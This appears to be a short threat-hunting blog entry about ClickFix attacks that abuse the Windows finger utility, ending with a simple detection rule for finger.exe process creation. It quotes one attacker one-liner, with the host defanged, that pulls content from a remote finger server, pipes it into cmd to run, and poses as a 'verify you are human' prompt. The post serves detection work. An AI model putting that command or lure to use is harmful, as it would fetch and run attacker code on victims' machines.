320. Adversaries Abuse Finger in ClickFix Attacks

Hello everyone!

Reading the news, I spotted another interesting variant of ClickFix attack, so let's look at available hunting opportunities.

According to the post, the adversary used the Finger executable to download a payload from a remote server and execute it via cmd, for example:

"cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'"

It's not the first time threat actors use this executable, but as it's not commonly used in modern environments, finger.exe execution may be a suspicious behavior marker itself:

event_type: "processcreatewin"

AND

proc_file_path: "finger.exe"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge